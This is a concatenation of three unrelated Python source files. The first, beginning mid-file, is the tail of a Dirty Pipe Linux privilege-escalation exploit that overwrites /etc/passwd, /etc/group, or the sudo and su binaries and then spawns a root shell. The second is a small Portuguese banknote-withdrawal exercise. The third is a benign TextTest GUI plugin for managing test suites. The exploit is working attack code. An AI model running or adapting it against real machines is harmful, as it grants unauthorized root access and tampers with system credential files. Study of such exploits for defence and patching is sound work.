print('[x] Do you have access to another user?')
print(f'[x] Remember to clean up {backup_path}')
return False
return True
def check_etc_passwd():
# Check if /etc/passwd exists
if not exists('/etc/passwd'):
return False
# Check if current user has login
user = getpass.getuser()
offset_data = find_offset_of_user_in_passwd(user)
if not offset_data:
return False
# Check if on boundary
if not within_page_bounds(offset_data[0], len(offset_data[1])):
return False
return True
def check_etc_group():
if not exists('/etc/group'):
return False
user = getpass.getuser()
offset_data = find_offset_of_sudo_in_group(user)
if not offset_data:
return False
if not within_page_bounds(offset_data[0], len(offset_data[1])):
return False
return True
def which(cmd):
return subprocess.getoutput(f'which {cmd}').strip()
def check_elf(cmd):
sudo_path = which(cmd)
if not exists(sudo_path):
return False
# Check if x86_64
if not platform.architecture(sudo_path) == ('64bit', 'ELF'):
return False
if not within_page_bounds(1, len(elfcode)):
return False
return True
def run_elf(binary_name):
# Backup file
binary_path = which(binary_name)
backup_path = f'/tmp/{binary_name}'
print(f'[*] Backing up {binary_path} to {backup_path}')
backup_file(binary_path, backup_path)
# Set offset
file_offset = 1
# Save original
print(f'[*] Saving original state of {binary_path}')
with open(binary_path, 'rb') as binary:
orig_data = binary.read(len(elfcode) + 2)[2:]
# Exploit
print(f'[*] Hijacking {binary_path}')
run_poc(bytes(elfcode), binary_path, file_offset)
# Run modified binary
print(f'[*] Executing modified {binary_path}')
os.system(binary_path)
# Restore state
print(f'[*] Restoring {binary_path}')
run_poc(orig_data, binary_path, file_offset)
# Pop a shell
print(f'[*] Popping root shell...')
print()
pty.spawn('/tmp/sh')
print()
# Cleanup
print(f'[!] Remember to cleanup {backup_path} and /tmp/sh')
print(f'[!] rm {backup_path}')
print('[!] rm /tmp/sh')
def run_etc_passwd():
# Backup file
backup_path = '/tmp/passwd'
target_file = '/etc/passwd'
print(f'[*] Backing up {target_file} to {backup_path}')
backup_file(target_file, backup_path)
# Get offset
user = getpass.getuser()
print(f'[*] Calculating offset of {user} in {target_file}')
(file_offset,
data_to_write,
original) = find_offset_of_user_in_passwd(user)
# Exploit
print(f'[*] Hijacking {target_file}')
run_poc(bytes(data_to_write, 'utf-8'), target_file, file_offset)
# Pop a shell
print(f'[*] Popping root shell...')
print()
pty.spawn(['su', user])
print()
print(f'[*] Restoring {target_file}')
run_poc(bytes(original, 'utf-8'), target_file, file_offset)
print(f'[!] Remember to cleanup {backup_path}')
print(f'[!] rm {backup_path}')
def run_etc_group():
# Backup file
backup_path = '/tmp/group'
target_file = '/etc/group'
print(f'[*] Backing up {target_file} to {backup_path}')
backup_file(target_file, backup_path)
# Get offset
user = getpass.getuser()
print(f'[*] Calculating offset of {user} in {target_file}')
(file_offset,
data_to_write,
original) = find_offset_of_sudo_in_group(user)
# Exploit
print(f'[*] Hijacking {target_file}')
run_poc(bytes(data_to_write, 'utf-8'), target_file, file_offset)
# Pop a shell
print(f'[*] Popping root shell...')
print()
print(f'[!] Login with password of {user} (you will have to login twice)')
print()
# Login as user to refresh groups, then call sudo su in a pseudo terminal with -P flag
pty.spawn(['su', user, '-P', '-c', 'sudo su'])
print()
print(f'[*] Restoring {target_file}')
run_poc(bytes(original, 'utf-8'), target_file, file_offset)
print(f'[!] Remember to cleanup {backup_path}')
print(f'[!] rm {backup_path}')
def main():
parser = argparse.ArgumentParser(description='Use dirty pipe vulnerability to pop root shell')
parser.add_argument('--target', choices=['passwd','group','sudo','su'], help='The target read-only file to overwrite')
args = parser.parse_args()
if not args.target or args.target == 'passwd':
print(f'[*] Attempting to modify /etc/passwd')
if check_etc_passwd():
run_etc_passwd()
sys.exit()
print(f'[X] Cannot modify /etc/passwd')
if not args.target or args.target == 'sudo':
print(f'[*] Attempting to modify sudo binary')
if check_elf('sudo'):
run_elf('sudo')
sys.exit()
print(f'[X] Cannot modify sudo binary')
if not args.target or args.target == 'su':
print(f'[*] Attempting to modify su binary')
if check_elf('su'):
run_elf('su')
sys.exit()
print(f'[X] Cannot modify su binary')
if not args.target or args.target == 'group':
print(f'[*] Attempting to modify /etc/group')
if check_etc_group():
run_etc_group()
sys.exit()
print(f'[X] Cannot modify /etc/group')
print(f'[X] Exploit could not be executed!')
if __name__ == '__main__':
main()
|
n50 = n20 = n10 = n1 = 0
n = int(input('qual sera o valor sacado'))
valortotal = n
while True:
if n >= 50:
n = n-50
n50 += 1
elif n >= 20:
n = n-20
n20 += 1
elif n >= 10:
n = n-10
n10 += 1
elif n >= 1:
n = n-1
n1 += 1
else:
break
print(f'seram entregues:')
if n50 != 0:
print(f'{n50} notas de R$50,00')
if n20 != 0:
print(f'{n20} notas de R$20,00')
if n10 != 0:
print(f'{n10} notas de R$10,00')
if n1 != 0:
print(f'{n1} notas de R$$1,00 ')
print(f'Para pagar um total de R${valortotal}')
|
"""
All the actions for administering the files and directories in a test suite
"""
import gtk, plugins, os, shutil, subprocess, testmodel,re
from .. import guiplugins, guiutils
from ordereddict import OrderedDict
from zipfile import ZipFile
from fnmatch import fnmatch
# Cut, copy and paste
class FocusDependentAction(guiplugins.ActionGUI):
def notifyTopWindow(self, window):
guiplugins.ActionGUI.notifyTopWindow(self, window)
window.connect("set-focus", self.focusChanged)
def focusChanged(self, dummy, widget):
freeTextWidget = isinstance(widget, gtk.Entry) or isinstance(widget, gtk.TextView)
if freeTextWidget:
self.setSensitivity(False)
elif self.isActiveOnCurrent():
self.setSensitivity(True)
class ClipboardAction(FocusDependentAction):
def isActiveOnCurrent(self, *args):
if guiplugins.ActionGUI.isActiveOnCurrent(self, *args):
for test in self.currTestSelection:
if test.parent:
return True
return False
def getSignalsSent(self):
return [ "Clipboard" ]
def _getStockId(self):
return self.getName()
def _getTitle(self):
return "_" + self.getName().capitalize()
def getTooltip(self):
return self.getName().capitalize() + " selected tests"
def noAncestorsSelected(self, test):
if not test.parent:
return True
if test.parent in self.currTestSelection:
return False
else:
return self.noAncestorsSelected(test.parent)
def performOnCurrent(self):
# If suites are selected, don't also select their contents
testsForClipboard = filter(self.noAncestorsSelected, self.currTestSelection)
self.notify("Clipboard", testsForClipboard, cut=self.shouldCut())
class CopyTests(ClipboardAction):
def getName(self):
return "copy"
def shouldCut(self):
return False
class CutTests(ClipboardAction):
def getName(self):
return "cut"
def shouldCut(self):
return True
class PasteTests(FocusDependentAction):
def __init__(self, *args):
FocusDependentAction.__init__(self, *args)
self.clipboardTests = []
self.removeAfter = False
def singleTestOnly(self):
return True
def _getStockId(self):
return "paste"
def _getTitle(self):
return "_Paste"
def getTooltip(self):
return "Paste tests from clipboard"
def notifyClipboard(self, tests, cut=False):
self.clipboardTests = tests
self.removeAfter = cut
self.setSensitivity(True)
def isActiveOnCurrent(self, test=None, state=None):
return guiplugins.ActionGUI.isActiveOnCurrent(self, test, state) and len(self.clipboardTests) > 0
def getCurrentTestMatchingApp(self, test):
# Try the exact application first, if that fails, look for extra-version
for currTest in self.currTestSelection:
if currTest.app == test.app:
return currTest
for currTest in self.currTestSelection:
if currTest.app.name == test.app.name:
return currTest
def getDestinationInfo(self, test):
currTest = self.getCurrentTestMatchingApp(test)
if currTest is None:
return None, 0
if currTest.classId() == "test-suite" and currTest not in self.clipboardTests:
return currTest, 0
else:
return currTest.parent, currTest.positionInParent() + 1
def getNewTestName(self, suite, oldName):
existingTest = suite.findSubtest(oldName)
if not existingTest:
dirName = suite.getNewDirectoryName(oldName)
if not os.path.exists(dirName):
return oldName
elif self.willBeRemoved(existingTest):
return oldName
nextNameCandidate = self.findNextNameCandidate(oldName)
return self.getNewTestName(suite, nextNameCandidate)
def willBeRemoved(self, test):
return self.removeAfter and test in self.clipboardTests
def findNextNameCandidate(self, name):
copyPos = name.find("_copy_")
if copyPos != -1:
copyEndPos = copyPos + 6
number = int(name[copyEndPos:])
return name[:copyEndPos] + str(number + 1)
elif name.endswith("copy"):
return name + "_2"
else:
return name + "_copy"
def getNewDescription(self, test):
if len(test.description) or self.removeAfter:
return test.description
else:
return "Copy of " + test.name
def getRepositionPlacement(self, test, placement):
currPos = test.positionInParent()
if placement > currPos:
return placement - 1
else:
return placement
def messageAfterPerform(self):
pass # do it below...
def performOnCurrent(self):
newTests = []
destInfo = OrderedDict()
for test in self.clipboardTests:
suite, placement = self.getDestinationInfo(test)
if suite:
newName = self.getNewTestName(suite, test.name)
destInfo[test] = suite, placement, newName
if len(destInfo) == 0:
raise plugins.TextTestError, "Cannot paste test there, as the copied test and currently selected test have no application/version in common"
suiteDeltas = {} # When we insert as we go along, need to update subsequent placements
for test, (suite, placement, newName) in destInfo.items():
suiteDeltas.setdefault(suite, 0)
realPlacement = placement + suiteDeltas.get(suite)
if self.removeAfter and newName == test.name and suite is test.parent:
# Cut + paste to the same suite is basically a reposition, do it as one action
repositionPlacement = self.getRepositionPlacement(test, realPlacement)
plugins.tryFileChange(test.parent.repositionTest, "Failed to reposition test: no permissions to edit the testsuite file",
test, repositionPlacement)
newTests.append(test)
else:
newDesc = self.getNewDescription(test)
# Create test files first, so that if it fails due to e.g. full disk, we won't register the test either...
testDir = suite.getNewDirectoryName(newName)
try:
self.moveOrCopy(test, testDir)
suite.registerTest(newName, newDesc, realPlacement)
testImported = suite.addTest(test.__class__, os.path.basename(testDir), newDesc, realPlacement)
# "testImported" might in fact be a suite: in which case we should read all the new subtests which
# might have also been copied
testImported.readContents(initial=False)
testImported.updateAllRelPaths(test.getRelPath())
suiteDeltas[suite] += 1
newTests.append(testImported)
if self.removeAfter:
message = "Failed to remove old test: didn't have sufficient write permission to the test files. Test copied instead of moved."
plugins.tryFileChange(test.remove, message)
except EnvironmentError, e:
if os.path.isdir(testDir):
shutil.rmtree(testDir)
self.showErrorDialog("Failed to paste test:\n" + str(e))
self.notify("SetTestSelection", newTests)
self.currTestSelection = newTests
self.notify("Status", self.getStatusMessage(suiteDeltas))
if self.removeAfter:
# After a paste from cut, subsequent pastes should behave like copies of the new tests
self.notify("Clipboard", newTests, cut=False)
self.clipboardTests = newTests
self.removeAfter = False
for suite, placement, newName in destInfo.values():
suite.contentChanged()
def getStatusMessage(self, suiteDeltas):
suiteName = suiteDeltas.keys()[0].name
if self.removeAfter:
return "Moved " + self.describeTests() + " to suite '" + suiteName + "'"
else:
return "Pasted " + self.describeTests() + " to suite '" + suiteName + "'"
def getSignalsSent(self):
return [ "SetTestSelection", "Clipboard" ]
def moveOrCopy(self, test, newDirName):
# If it exists it's because a previous copy has already taken across the directory
if not os.path.isdir(newDirName):
oldDirName = test.getDirectory()
if self.removeAfter:
self.movePath(oldDirName, newDirName)
else:
self.copyPath(oldDirName, newDirName)
# Methods overridden by version control
@staticmethod
def movePath(oldDirName, newDirName):
os.rename(oldDirName, newDirName)
@staticmethod
def copyPath(oldDirName, newDirName):
shutil.copytree(oldDirName, newDirName, ignore=shutil.ignore_patterns(*plugins.controlDirNames))
# And a generic import test. Note acts on test suites
class ImportTest(guiplugins.ActionDialogGUI):
def __init__(self, *args):
guiplugins.ActionDialogGUI.__init__(self, *args)
self.optionGroup.addOption("name", self.getNameTitle())
self.optionGroup.addOption("desc", self.getDescTitle(), description="Enter a description of the new " + self.testType().lower() + " which will be inserted as a comment in the testsuite file.", multilineEntry=True)
self.optionGroup.addOption("testpos", self.getPlaceTitle(), "last in suite", allocateNofValues=2, description="Where in the test suite should the test be placed?")
self.testsImported = []
def getConfirmationMessage(self):
testName = self.getNewTestName()
suite = self.getDestinationSuite()
self.checkName(suite, testName)
newDir = os.path.join(suite.getDirectory(), testName)
if os.path.isdir(newDir):
if self.testFilesExist(newDir, suite.app):
raise plugins.TextTestError, "Test already exists for application " + suite.app.fullName() + \
" : " + os.path.basename(newDir)
else:
return "Test directory already exists for '" + testName + "'\nAre you sure you want to use this name?"
else:
return ""
def _getStockId(self):
return "add"
def getSizeAsWindowFraction(self):
# size of the dialog
return 0.5, 0.45
def testFilesExist(self, dir, app):
for fileName in os.listdir(dir):
parts = fileName.split(".")
if len(parts) > 1 and parts[1] == app.name:
return True
return False
def singleTestOnly(self):
return True
def correctTestClass(self):
return "test-suite"
def getNameTitle(self):
return self.testType() + " Name"
def getDescTitle(self):
return self.testType() + " Description"
def getPlaceTitle(self):
return "\nPlace " + self.testType()
def getDefaultName(self):
return ""
def getDefaultDesc(self):
return ""
def updateOptions(self):
self.optionGroup.setOptionValue("name", self.getDefaultName())
self.optionGroup.setOptionValue("desc", self.getDefaultDesc())
self.setPlacements(self.currTestSelection[0])
return True
def setPlacements(self, suite):
# Add suite and its children
placements = [ "first in suite" ]
for test in suite.testcases:
placements.append("after " + test.name)
placements.append("last in suite")
self.optionGroup.setPossibleValues("testpos", placements)
self.optionGroup.getOption("testpos").reset()
def _getTitle(self):
return "Add " + self.testType()
def testType(self): #pragma : no cover - doc only
return ""
def messageAfterPerform(self):
if len(self.testsImported):
return "Added new " + ", ".join((repr(test) for test in self.testsImported))
def getNewTestName(self):
# Overwritten in subclasses - occasionally it can be inferred
return self.optionGroup.getOptionValue("name").strip()
def performOnCurrent(self):
testName = self.getNewTestName()
description = self.optionGroup.getOptionValue("desc")
placement = self.getPlacement()
self.testsImported = []
for suite in self.currTestSelection:
suite.registerTest(testName, description, placement)
testDir = suite.makeSubDirectory(testName)
self.testsImported.append(self.createTestContents(suite, testDir, description, placement))
suite.contentChanged()
self.notify("SetTestSelection", self.testsImported)
def getSignalsSent(self):
return [ "SetTestSelection" ]
def getDestinationSuite(self):
return self.currTestSelection[0]
def getPlacement(self):
option = self.optionGroup.getOption("testpos")
return option.possibleValues.index(option.getValue())
def checkName(self, suite, testName):
if len(testName) == 0:
raise plugins.TextTestError, "No name given for new " + self.testType() + "!" + "\n" + \
"Fill in the 'Adding " + self.testType() + "' tab below."
if testName.find(" ") != -1:
raise plugins.TextTestError, "The new " + self.testType() + \
" name is not permitted to contain spaces, please specify another"
for test in suite.testcases:
if test.name == testName:
raise plugins.TextTestError, "A " + self.testType() + " with the name '" + \
testName + "' already exists, please choose another name"
class ImportTestCase(ImportTest):
def __init__(self, *args):
ImportTest.__init__(self, *args)
self.addDefinitionFileOption()
def testType(self):
return "Test"
def addDefinitionFileOption(self):
self.addOption("opt", "Command line options")
def createTestContents(self, suite, testDir, description, placement):
self.writeDefinitionFiles(suite, testDir)
self.writeEnvironmentFile(suite, testDir)
self.writeResultsFiles(suite, testDir)
return suite.addTestCase(os.path.basename(testDir), description, placement)
def getWriteFileName(self, name, suite, testDir):
return os.path.join(testDir, name + "." + suite.app.name)
def getWriteFile(self, name, suite, testDir):
return open(self.getWriteFileName(name, suite, testDir), "w")
def writeEnvironmentFile(self, suite, testDir):
envDir = self.getEnvironment(suite)
if len(envDir) == 0:
return
envFile = self.getWriteFile("environment", suite, testDir)
for var, value in envDir.items():
envFile.write(var + ":" + value + "\n")
envFile.close()
def writeDefinitionFiles(self, suite, testDir):
optionString = self.getOptions(suite)
if len(optionString):
optionFile = self.getWriteFile("options", suite, testDir)
optionFile.write(optionString + "\n")
return optionString
def getOptions(self, *args):
return self.optionGroup.getOptionValue("opt")
def getEnvironment(self, *args):
return {}
def writeResultsFiles(self, suite, testDir):
# Cannot do anything in general
pass
class ImportTestSuite(ImportTest):
def __init__(self, *args):
ImportTest.__init__(self, *args)
self.addEnvironmentFileOptions()
def testType(self):
return "Suite"
def createTestContents(self, suite, testDir, description, placement):
return suite.addTestSuite(os.path.basename(testDir), description, placement, self.writeEnvironmentFiles)
def addEnvironmentFileOptions(self):
self.addSwitch("env", "Add environment file")
def writeEnvironmentFiles(self, newSuite):
if self.optionGroup.getSwitchValue("env"):
envFile = os.path.join(newSuite.getDirectory(), "environment")
file = open(envFile, "w")
file.write("# Dictionary of environment to variables to set in test suite\n")
class ImportApplication(guiplugins.ActionDialogGUI):
def __init__(self, allApps, dynamic, inputOptions):
guiplugins.ActionDialogGUI.__init__(self, allApps, dynamic, inputOptions)
self.fileChooser = None
self.newApplication = None
self.inputOptions = inputOptions
self.rootDirectories = inputOptions.rootDirectories
self.addOption("name", "Full name of application", description="Name of application to use in reports etc.")
self.addOption("ext", "\nFile extension to use for TextTest files associated with this application", description="Short space-free extension, to identify all TextTest's files associated with this application")
possibleSubDirs = self.findSubDirectories()
self.addOption("subdir", "\nSubdirectory name to store the above application files under (leave blank for local storage)", possibleValues=possibleSubDirs)
self.addOption("javaclass", "\nJava Class name (instead of executable program)")
self.addSwitch("gui", "GUI testing option chooser",
options = [ "Disable GUI testing options",
"PyGTK GUI with StoryText",
"Tkinter GUI with StoryText",
"wxPython GUI with StoryText",
"SWT GUI with StoryText",
"Eclipse RCP GUI with StoryText",
"Eclipse GEF GUI with StoryText",
"Java Swing GUI with StoryText",
"Other embedded Use-case Recorder (e.g. NUseCase)",
"Other GUI-test tool (enable virtual display only)" ],
hideOptions=True)
self.addSwitch("cpmock", "Enable CaptureMock for record/playback mocking")
possibleDirs = []
for app in allApps:
if app.getDirectory() not in possibleDirs:
possibleDirs.append(app.getDirectory())
if len(possibleDirs) == 0:
possibleDirs = self.rootDirectories
self.addOption("exec", "\nSelect executable program to test", description="The full path to the program you want to test", possibleDirs=possibleDirs, selectFile=True)
def createFileChooser(self, *args):
self.fileChooser = guiplugins.ActionDialogGUI.createFileChooser(self, *args)
return self.fileChooser
def createOptionWidget(self, option):
box, entry = guiplugins.ActionDialogGUI.createOptionWidget(self, option)
if option is self.optionGroup.getOption("javaclass"):
entry.connect("changed", self.javaClassChanged)
return box, entry
def javaClassChanged(self, *args):
if self.fileChooser:
self.setFileChooserSensitivity()
def setFileChooserSensitivity(self):
javaclass = self.optionGroup.getValue("javaclass")
sensitive = self.fileChooser.get_property("sensitive")
newSensitive = len(javaclass) == 0
if newSensitive != sensitive:
self.fileChooser.set_property("sensitive", newSensitive)
def findSubDirectories(self):
allDirs = []
for rootDir in self.rootDirectories:
usableFiles = filter(lambda f: f not in plugins.controlDirNames, os.listdir(rootDir))
allFiles = [ os.path.join(rootDir, f) for f in usableFiles ]
allDirs += filter(os.path.isdir, allFiles)
allDirs.sort()
return map(os.path.basename, allDirs)
def isActiveOnCurrent(self, *args):
return True
def _getStockId(self):
return "add"
def _getTitle(self):
return "Add Application"
def messageAfterPerform(self):
pass
def getTooltip(self):
return "Define a new tested application"
def checkSanity(self, ext, executable, subdir, directory, javaClass):
if not ext:
raise plugins.TextTestError, "Must provide a file extension for TextTest files"
for char in " ./":
if char in ext:
raise plugins.TextTestError, "File extensions may not contain the character " + repr(char) + ". It's recommended to stick to alphanumeric characters for this field."
if not javaClass and (not executable or not os.path.isfile(executable)):
raise plugins.TextTestError, "Must provide a valid path to a program to test"
for char in "/\\":
if char in subdir:
raise plugins.TextTestError, "Subdirectory name must be a local name (not contain " + repr(char) + ").\nTextTest only looks for applications one level down in the hierarchy."
if os.path.exists(os.path.join(directory, "config." + ext)):
raise plugins.TextTestError, "Test-application already exists at the indicated location with the indicated extension: please choose another name"
def getSignalsSent(self):
return [ "NewApplication" ]
def getMainClass(self, jarFile):
f = ZipFile(jarFile).open("META-INF/MANIFEST.MF")
for line in f:
parts = [ part.strip() for part in line.split(":") ]
if len(parts) == 2 and parts[0] == "Main-Class":
return parts[1]
def getStatusMessage(self, app):
return "Created new application '" + app.fullName() + "'."
def performOnCurrent(self):
executable = self.optionGroup.getOptionValue("exec")
ext = self.optionGroup.getOptionValue("ext")
subdir = self.optionGroup.getOptionValue("subdir")
directory = self.findFullDirectoryPath(subdir)
javaClass = self.optionGroup.getOptionValue("javaclass")
self.checkSanity(ext, executable, subdir, directory, javaClass)
plugins.ensureDirectoryExists(directory)
if javaClass:
executable = javaClass
configEntries = OrderedDict({ "executable" : executable })
configEntries["filename_convention_scheme"] = "standard"
if javaClass:
configEntries["interpreter"] = "java"
fullName = self.optionGroup.getOptionValue("name")
if fullName:
configEntries["full_name"] = fullName
if self.optionGroup.getSwitchValue("cpmock"):
configEntries["import_config_file"] = "capturemock_config"
useGui = self.optionGroup.getSwitchValue("gui")
if useGui > 0:
configEntries["use_case_record_mode"] = "GUI"
if useGui in range(1, 8):
configEntries["use_case_recorder"] = "storytext"
storytextDir = os.path.join(directory, "storytext_files")
plugins.ensureDirectoryExists(storytextDir)
# Create an empty UI map file so it shows up in the Config tab...
open(os.path.join(storytextDir, "ui_map.conf"), "w")
toolkits = [ "gtk", "tkinter", "wx", "javaswt", "javarcp", "javagef", "javaswing" ]
toolkit = toolkits[useGui - 1]
if "java" in toolkit:
self.setJavaGuiTestingEntries(toolkit, directory, ext, configEntries)
else:
self.setPythonGuiTestingEntries(toolkit, directory, ext, configEntries)
elif useGui == 9:
configEntries["use_case_recorder"] = "none"
self.newApplication = self.createApplication(ext, directory, configEntries)
self.notify("NewApplication", self.newApplication)
self.notify("Status", self.getStatusMessage(self.newApplication))
def createApplication(self, ext, directory, configEntries):
dircache = testmodel.DirectoryCache(directory)
newApp = testmodel.Application(ext, dircache, [], self.inputOptions, configEntries)
dircache.refresh() # we created a config file...
return newApp
def respond(self, *args):
if len(self.validApps) > 0:
return guiplugins.ActionDialogGUI.respond(self, *args)
def runDialog(self):
dialog = self.showConfigurationDialog()
width = guiutils.guiConfig.getWindowDimension("width", self.diag)
height = guiutils.guiConfig.getWindowDimension("height", self.diag)
dialog.resize(width, height)
while True:
response = dialog.run()
if response != gtk.RESPONSE_ACCEPT:
raise plugins.TextTestError, "Application creation cancelled."
try:
self.performOnCurrent()
break
except plugins.TextTestError, e:
self.showErrorDialog(str(e))
dialog.hide()
dialog.destroy()
return self.newApplication, self.getStatusMessage(self.newApplication)
def getFileOnPath(self, fileName):
for pathElem in os.getenv("PATH").split(os.pathsep):
fullPath = os.path.join(pathElem, fileName)
if os.path.isfile(fullPath):
return fullPath
def getStoryTextPythonInterpreter(self, toolkit):
if os.name == "posix":
return "storytext -i " + toolkit
else:
storytextPath = self.getFileOnPath("storytext.py")
if storytextPath:
return "python " + storytextPath + " -i " + toolkit
else:
raise plugins.TextTestError, "Could not set up Python-GUI testing with StoryText, could not find StoryText installation on PATH"
def setPythonGuiTestingEntries(self, toolkit, directory, ext, configEntries):
configEntries["interpreter"] = self.getStoryTextPythonInterpreter(toolkit)
if toolkit == "gtk":
comment = "XDG_CONFIG_HOME points to user's ~/.config directory.\n" + \
"Behaviour of e.g. FileChoosers can vary wildly depending on settings there.\n" + \
"The following settings makes sure it uses an empty test-dependent directory instead."
configEntries["section_comment"] = comment
configEntries["copy_test_path"] = "xdg_config_home"
configEntries["test_data_ignore"] = "xdg_config_home"
configEntries["test_data_environment"] = [("xdg_config_home", "XDG_CONFIG_HOME")]
elif toolkit == "tkinter":
# StoryText doesn't handle tkMessageBox, deal with it via interception by default
comment = "Tkinter doesn't provide any means to simulate interaction with tkMessageBox.\n" + \
"Therefore StoryText cannot handle it. So we capture interaction with it instead.\n" + \
"Cannot have multiple threads interacting with tkinter so we disable the threading also."
configEntries["section_comment"] = comment
configEntries["import_config_file"] = "capturemock_config"
cpMockFileName = os.path.join(directory, "capturemockrc." + ext)
with open(cpMockFileName, "w") as f:
f.write("[python]\n" +
"intercepts = tkMessageBox\n\n" +
"[general]\n" +
"server_multithreaded = False\n")
elif toolkit == "wx":
comment = "wxPython GUIs don't seem to work very well when the hide flag is set on Windows.\n" + \
"So we disable it by default here: multiple desktops may be useful."
configEntries["section_comment"] = comment
configEntries["virtual_display_hide_windows"] = "false"
def findStoryTextInPath(self):
suffix = ".bat" if os.name == "nt" else ""
for pathElem in os.getenv("PATH").split(os.pathsep):
storytextPath = os.path.join(pathElem, "storytext")
jythonPath = os.path.join(pathElem, "jython" + suffix)
if os.path.isfile(storytextPath) and os.path.isfile(jythonPath):
return storytextPath, jythonPath
return None, None
def findSwingLibraryPath(self, storytextPath):
rootDir = os.path.dirname(os.path.dirname(storytextPath))
pattern = "swinglibrary-*.jar"
for root, _, files in os.walk(rootDir):
for file in files:
if fnmatch(file, pattern):
return os.path.join(rootDir, root, "*")
def has_special_chars(self, path):
return " " in path or "(" in path
def get_dos_corrected_path(self, path):
if os.name == "posix" or not self.has_special_chars(path):
return path
# Windows paths with spaces don't work in classpaths, figure out the correct DOS path
dirname, local = os.path.split(path)
if self.has_special_chars(local):
p = subprocess.Popen([ "dir", "/x" ], cwd=dirname, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out = p.communicate()[0]
for line in out.splitlines():
if line.endswith(local):
parts = line.split()
local = parts[3]
break
return os.path.join(self.get_dos_corrected_path(dirname), local)
def setJavaGuiTestingEntries(self, toolkit, directory, ext, configEntries):
storytextPath, jythonPath = self.findStoryTextInPath()
if not storytextPath:
raise plugins.TextTestError, "Could not set up Java-GUI testing with StoryText, could not find StoryText/Jython installation on PATH"
interpreters = [("jython", jythonPath), ("storytext", storytextPath)]
configEntries["interpreters"] = interpreters
# Jython messages, probably don't want to compare them
configEntries["run_dependent_text"] = [("stderr*", "\\*sys-package-mgr\\*")]
executable = configEntries["executable"]
classpath = []
if executable.endswith(".jar"):
# Java Guis of one sort or another
# We don't know how to load jar files directly, store the main class name and add the jar file to the environment.
mainClass = self.getMainClass(executable)
if not mainClass:
raise plugins.TextTestError, "Jar file provided has no main class specified, cannot use it as an executable"
classpath.append(self.get_dos_corrected_path(executable))
configEntries["executable"] = mainClass
if "swing" in toolkit:
swingLibraryPath = self.findSwingLibraryPath(storytextPath)
if swingLibraryPath:
classpath.append(swingLibraryPath)
if classpath:
fileName = os.path.join(directory, "environment." + ext)
with open(fileName, "a") as f:
f.write("CLASSPATH:" + os.pathsep.join(classpath) + "\n")
storytextOptionsFile = os.path.join(directory, "storytext_options." + ext)
with open(storytextOptionsFile, "w") as f:
f.write("# StoryText options. Run storytext --help for more information on what can be added here\n")
f.write("-i " + toolkit + "\n")
with open(storytextOptionsFile + ".debug", "w") as f:
f.write("-l debug\n")
jythonOptionsFile = os.path.join(directory, "jython_options." + ext)
with open(jythonOptionsFile, "w") as f:
f.write("# Add Java properties as required, for example:\n")
f.write("#-Djava.util.prefs.userRoot=preferences\n")
f.write("# Can also supply JVM arguments by prefixing them with -J, for example:\n")
f.write("#-J-XX:MaxPermSize=128M")
def findFullDirectoryPath(self, subdir):
for rootDir in self.rootDirectories:
candidate = os.path.normpath(os.path.join(rootDir, subdir))
if os.path.isdir(candidate):
return candidate
return os.path.normpath(os.path.join(self.rootDirectories[0], subdir))
def getSizeAsWindowFraction(self):
# size of the dialog
return 0.7, 0.9
class ImportFiles(guiplugins.ActionDialogGUI):
def __init__(self, allApps, dynamic, inputOptions):
self.creationDir = None
self.defaultAppendAppName = False
self.appendAppName = False
self.currentStem = ""
self.fileChooser = None
self.newFileInfo = (None, False)
guiplugins.ActionDialogGUI.__init__(self, allApps, dynamic, inputOptions)
self.addOption("stem", "Type of file/directory to create", allocateNofValues=2)
self.addOption("v", "Version identifier to use")
possibleDirs = self.getPossibleDirs(allApps, inputOptions)
# The point of this is that it's never sensible as the source for anything, so it serves as a "use the parent" option
# for back-compatibility
self.addSwitch("act", options=[ "Import file/directory from source", "Create a new file", "Create a new directory" ])
self.addOption("src", "Source to copy from", selectFile=True, possibleDirs=possibleDirs)
def getPossibleDirs(self, allApps, inputOptions):
if len(allApps) > 0:
return sorted(set((app.getDirectory() for app in allApps)))
else:
return inputOptions.rootDirectories
def singleTestOnly(self):
return True
def _getTitle(self):
return "Create/_Import"
def getTooltip(self):
return "Create a new file or directory, possibly by copying it"
def _getStockId(self):
return "new"
def getDialogTitle(self):
return "Create/Import Files and Directories"
def isActiveOnCurrent(self, *args):
return self.creationDir is not None and guiplugins.ActionDialogGUI.isActiveOnCurrent(self, *args)
def getSizeAsWindowFraction(self):
# size of the dialog
return 0.7, 0.9
def getSignalsSent(self):
return [ "NewFile" ]
def messageAfterPerform(self):
pass
def updateOptions(self):
self.currentStem = ""
return False
def fillVBox(self, vbox, group):
test = self.currTestSelection[0]
dirText = self.getDirectoryText(test)
self.addText(vbox, "<b><u>" + dirText + "</u></b>")
self.addText(vbox, "<i>(Test is " + repr(test) + ")</i>")
return guiplugins.ActionDialogGUI.fillVBox(self, vbox, group)
def stemChanged(self, *args):
option = self.optionGroup.getOption("stem")
newStem = option.getValue()
if newStem in option.possibleValues and newStem != self.currentStem:
self.currentStem = newStem
version = self.optionGroup.getOptionValue("v")
sourcePath = self.getDefaultSourcePath(newStem, version)
self.optionGroup.setValue("src", sourcePath)
if self.defaultAppendAppName:
self.updateAppendAppName(newStem != "testcustomize.py")
def actionChanged(self, *args):
if self.fileChooser:
self.setFileChooserSensitivity()
def setFileChooserSensitivity(self):
action = self.optionGroup.getValue("act")
sensitive = self.fileChooser.get_property("sensitive")
newSensitive = action == 0
if newSensitive != sensitive:
self.fileChooser.set_property("sensitive", newSensitive)
def getTargetPath(self, *args, **kwargs):
targetPathName = self.getFileName(*args, **kwargs)
return os.path.join(self.creationDir, targetPathName)
def getDefaultSourcePath(self, stem, version):
targetPath = self.getTargetPath(stem, version)
test = self.currTestSelection[0]
pathNames = test.getAllPathNames(stem, refVersion=version)
if len(pathNames) > 0:
firstSource = pathNames[-1]
if os.path.basename(firstSource).startswith(stem + "." + test.app.name):
targetPath = self.getTargetPath(stem, version, appendAppName=True)
if firstSource != targetPath:
return firstSource
elif len(pathNames) > 1:
return pathNames[-2]
return test.getDirectory()
def createComboBoxEntry(self, *args):
combobox, entry = guiplugins.ActionDialogGUI.createComboBoxEntry(self, *args)
combobox.connect("changed", self.stemChanged)
return combobox, entry
def createRadioButtons(self, *args):
buttons = guiplugins.ActionDialogGUI.createRadioButtons(self, *args)
buttons[0].connect("toggled", self.actionChanged)
return buttons
def createFileChooser(self, *args):
self.fileChooser = guiplugins.ActionDialogGUI.createFileChooser(self, *args)
self.fileChooser.set_name("Source File Chooser")
self.setFileChooserSensitivity() # Check initial values, maybe set insensitive
return self.fileChooser
def addText(self, vbox, text):
header = gtk.Label()
